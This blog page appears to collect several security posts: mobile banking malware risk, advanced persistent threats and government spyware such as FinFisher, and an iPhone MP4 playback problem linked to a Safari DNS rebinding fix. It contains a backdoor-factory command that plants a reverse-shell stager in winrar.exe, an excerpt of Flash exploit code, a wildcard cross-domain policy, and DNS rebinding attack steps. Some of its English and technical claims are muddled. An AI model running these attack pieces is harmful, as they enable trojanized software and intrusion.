What if your mobile phone infected by malware? Do you think it will harmful to bank system?

If you are my follower, do you remember that we had discussion on malware infection technique last year. A critical malware incident occured in U.S. weapons manufacturer Lockheed Martin Corp on 2011. Hackers infiltrated to their internal network.This incident driven Lockheed Martin develop kill chain framework. The goal of this framework is going to defense malware activities. Below table is the famous framework of Lockheed Martin Kill Chain.

Refer to above table, disrupt the malware infection process need deny in delivery phase. However the local anti-virus install on mobile phone do not have such capabilities. The mobile finance application provides flexibility to client. But it was not secure!

Under this context, can we say online banking will be secure than mobile finance apps install on mobile phone? As a matter of fact, a mobile finance applications install on mobile phone exploits programming syntax once phone compromised by hacker. It such a way assists hacker understand the finance institution back end process. Compare with online banking system, bank customers may vulnerable to man-in-the-middle causes privacy leakage. However the overall risk rating lower than mobile finance application software. At least hacker may have difficulties infiltrate to back-end system.

Cyber Crime Business Is Still Booming, especially Targeted attack trends. It is hard to tell what is the functionality on mobile finance application software in future. May become a electronic wallet. Since a design weakness has been known, who is the appropriate guy to metigate the on going strategy in future?

It is a long story, let’s discuss later!

 

 

Application Development, Cell Phone (iPhone, Android, windows mobile), System

A wide range of views (Advanced persistent threat)

855 Comments

We heard a technical terms named advanced persistent threat since 2013. An information which announced by cyber security company (kaspersky, FireEye, Symantec….etc) but not acknowledge by instigator . The story looks amazing that a security consulting firm (Mandiant) fooled by hacker. By coincidence, it found malicious finger print on gmail account and email message contained alleged resources came from China during investigation. This incident lets people in the world believe that cyber war will be happen in between country to country. A technical vocabulary so called Advanced Persistent Threat spreads around the world.

An unauthorized person gains access to a network and stays there undetected for a long period of time. Cyber security terminology so called APT attack. APT style attack confused security experts. Their mechanism contains many shadow nodes. The shadow nodes located in different areas and countries. It can take this advantage and convert as political tool. It is a sword. Careerist can blame another country that they are dishonest using internet. Who’s cast a unrighted wrong, believed that above diagram can provide an idea to you in this regard.

Reference: – Unofficial information which did not acknowledge by instigator

APT 1: cyber espionage group based in China – Discovered on Feb 2013

APT 28: Russia’s Cyber Espionage Operations – Discovered on Oct 2014

whistle blower (Snowden) – surveillance program scandal ( PRISM ) – Discover on Jan 2014

The design objective of Advanced persistent threat:

Enabled espionage using a variety of intelligence gathering techniques to access sensitive information.

Government enforcement official tools

i. Da Vinci and Galileo

Made by the Italian company Hacking Team, use to Hijack Phones for covert collection of emails, text messages, call history and address books, and they can be used to log keystrokes and obtain search history data.

Remark: An Official announcement in 2015 near year end, Da Vinci products not going to export to other countries due to data leakage incident happened on their campus.

ii. FinFisher (Neodymium & Promethium)

Specific users targeted in Europe and Turkey (last update on Dec 2016)

Neodymium uses the W32/Wingbird.A!dha backdoor to spy on users.

Promethium is a a “backdoor” program, it is a malware. He will masquerades as popular Windows tools such as WinUtils, TrueCrypt, WinRAR and SanDisk.

Remark: CVE-2016-4117 confusion code bug in Adobe Flash equivalent a instigator with Neodymium and Promethium. The Adobe Flash bug allow corrupt one of the objects to extend its length to 0xffffffff (see below source code) and its data buffer to address 0. The attacker are allow to access all of the user space memory once ByteArray corrupted. And such a way attacker execute embedded shellcode. If the Flash Player version is older than 21.0.0.196, the attack can’t execute.

public static function flash20(ba:Dtaa3, var4:uint, var5:uint)
{
   var len:uint;
   var flash50:uint;
   try
   {
       flash38 = true;
       flash21 = ba;
       len = ba.length;
       flash50 = (ba.a1 ^ ba.a5);
       ba.a2 = 0xFFFFFFFF;
       ba.a6 = (0XFFFFFFFF ^ flash50);
       ba.endian = Endian.LITTLE_ENDIAN;
       flash39 = var5;
       len = ba.length;
       if (len !=0xFFFFFFFF)
       {
           flash3("");
       };
       if (flash72)
       {
           Play3.flash20(); // Win32.Exec()
        }
       else
       {
           flash1("");
        };
        flash34(var5, var4);
        }

Advanced Persistent Threat – Drawback of remote monitoring

Traditional Lawful Interception solutions face new challenges which highlight by Finfisher (see below)

  • Data not transmitted over any network
  • Encrypted Communications
  • Targets in foreign countries

Finfisher resolution:

FinSpy was installed on several computer systems inside internet Cafes in critical areas in order to monitor them for suspicious activity, especially Skype communications to foreign individuals. Using the Webcam, pictures of the targets were taken while they were using the system

Traditional tactical or strategic Interception solutions face challenges which point out by Finfisher (see below):

  • Data not transmitted over any network and kept on the device
  • Encrypted Communications in the Air-Interface, which
  • avoid the usage of tactical active or passive Off-Air Systems
  • End-to-end encryption from the device such as Messengers,
  • Emails or PIN messages

Finfisher resolution:

FinSpy Mobile was deployed on BlackBerry mobile phones of several Targets to monitor all communications, including SMS/MMS, Email and BlackBerry Messenger.

The official spy tools looks powerful, however there is another sniff technique which available in the IT world.

Implant backdoor example:

Not going to teach how to hack the system but it is a better understanding …………..

This session not going to get in touch with FinFisher backdoor. However few available solution in the market guide you implant a backdoor to Winrar.exe. One of the example display as below:

sudo backdoor-factory -f /home/assault/Downloads/winrar.exe -s iat_reverse_tcp_stager_threaded -H 192.168.50.15 -P 8080

Government enforcement agency looks not difficult to expand the APT area of coverage. A lot of time they are relies on phishing.

Concept wise equivalent to government enforcement tool

The objective of the APT intend to collect sensitive data or voice messages during surveillance program process. And therefore the compatibility of the malware become an important factor. We are not a government agency but we can run a test with similar concept of design.

Phishing with Empire – Empire software supports macOS, Linux, and Windows hosts from one listener. The only requirement is that you need find a Command and Control (C2) work with you.

Summary:

The key words advanced persistence threat sound scary however it is only a surveillance program. As a normal citizen I do not believe foreign country have interest on my telephone conversation. From data privacy, it looks that it contained grey area since we do not know the reason why we are under surveillance. Such action let people nervous. However my expectation on these technology is that it must expand to some area in the city which take care the monitor and control of criminal activities. What do you think?

Cell Phone (iPhone, Android, windows mobile)

why H.264 (MP4) play on iphone (7/6S/6) is quite annoying

928 Comments

Use your iPhone play H.264 (MP4) video is annoying, the problem is that sometimes the videos work, sometimes it doesn’t. As a matter of fact, the IOS are quite unstable with mp4 format and h.264 on HTML5. But why is that people always encounter the problem of MP4 not playing on iPhone 7/6S/6?

iPhone 7 Only Supports Two Types of MP4 Files Natively

1. MP4 video with H.264 codec, and the MP4 should meet below specifications:

Up to 1080P, 30fps, high profile level 4.1 with AAC-LC audio below 160Kbps, 48kHz and stereo audio.

2. MP4 video with MPEG-4 codec, and have to meet another different specifications of:

Up to 2.5 Mbps, 640 X 480 resolution, 30fps, simple profile with AAC-LC audio up to 160 Kbps, 48kHz and stereo audio.

iPhone 4S

Compatible with H.264 or MPEG-4 video format with the following specifications:If it is H.264 video, it should meet: up to 1080p, 30 frames per second, High Profile level 4.1 with AAC-LC audio up to 160 Kbps, 48kHz, stereo audio in .m4v, .mp4, and .mov file formats;

If it is MPEG-4 video, it should meet: up to 2.5 Mbps, 640 by 480 pixels, 30 frames per second, Simple Profile with AAC-LC audio up to 160 Kbps per channel, 48kHz, stereo audio in .m4v, .mp4, and .mov file formats;

Think it over? The development life cycle on iphone 4s to iphone 7 not a short period, why there were no improvement in this area?

The culprit

a. iOS10 videos not playing with X-Accel-Redirect

b. X-accel allows for internal redirection to a location determined by a header returned from a backend.

c. Different browsers (Firefox, Safari & IE) have different policies mechanism to cache.

  • TTL hold the valid time of dns entry
  • Browser should cache until TTL expires

But the major factor bother Apple development team not the above items, the issue is that they found a vulnerability in Safari.

The instigator of this vulnerability

Refer to below diagram, CFNetwork Framework embedded in core services layer. It provides the following functions.

  • Use BSD sockets
  • Create encrypted connections using SSL or TLS
  • Resolve DNS hosts
  • Work with HTTP servers, authenticating HTTP servers, and HTTPS servers
  • Work with FTP servers
  • Publish, resolve, and browse Bonjour services

Unfortunately the vulnerability found that Safari support of HTTP/0.9 and accidentally allow cross-protocol exploitation of non-HTTP services using DNS rebinding. The remediation step of Apple is that restrict HTTP/0.9 responses to default ports and canceling resource loads if the document was loaded with a different HTTP protocol version. Sounds like a middle man verify the communication between external and core services. However it break X-Accl-Redirect function thus H.264 (MP4) doesn’t work properly.

Reference:

Apple remediation of CVE-2016-4760 (About the security content of iOS 10)

iOS 10 – Released September 13, 2016

WebKit

Available for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later

Impact: A malicious website may be able to access non-HTTP services

Description: Safari’s support of HTTP/0.9 allowed cross-protocol exploitation of non-HTTP services using DNS rebinding. The issue was addressed by restricting HTTP/0.9 responses to default ports and canceling resource loads if the document was loaded with a different HTTP protocol version.

Web browser design weakness (DNS pinning) & DNS rebinding vulnerability

Web browser pins host name to IP address but pin is easily to release with below command.

<img src:http://xxx.com:81/>

DNS rebinding vulnerability: Attacker will respond with the XML below:

<?xml version"1.0"?>
<cross-domain-policy>
 <allow-access-from domain="*" to-ports="*" />
</cross-domain-policy>

DNS rebinding scenario replay:

  1. Victim visits the malicious Web site hunt.com and loads the script it contains.

2. The attacker then changes the DNS entry of hunt.com in order to resolve to the internal server’s IP address, which is the target. In addition, the attacker disconnects the Web server that was running on the original IP address.

3. The script uses a timed event (setIntervall or setTimeout) to load a Web page from hunt.com. (Different browsers (Firefox, Safari & IE) have different policies mechanism to cache).

4. The victim’s Web browser executes the script and tries to connect back to hunt.com using the IP address, which is bound to it due to DNS pinning. But, as the Web server is no longer available, the connection is rejected and DNS pinning is dropped, due to the weakness described in the previous section.

5. The browser then drops the DNS pinning and does a new DNS lookup request for hunt.com. This time, the response results in a different IP address; the browser has removed from its cache the previous mapping of the server hostname (hunt.com) to an IP address, so cannot be protected from the misdirection.

6. As the new IP address points to the internal server, the attacker’s script is now able to access the internal server’s content and reveal it.

Information Supplement – iOS security function:

The security feature set on iOS or Mac OS design are advanced. The Security Server (securityd) is a daemon running in macOS and iOS that implements several security protocols, such as encryption, decryption, and (in macOS) authorization computation. The Security Agent is a separate process that provides the user interface for the Security Server in macOS (not iOS). Its primary purpose is to request authentication whenever an app requests additional privileges.

The iOS operating system isolates each and every app on the system. Apps are not allowed to view or modify each other’s data, business logic, and so on. Isolation prevents one app from knowing whether any other app is present on the system or whether apps can access the iOS operating system kernel until the device is jailbroken. This ensures a high degree of separation between the app and operating system.

iOS provides two types of isolation:

  • Process isolation
  • Filesystem isolation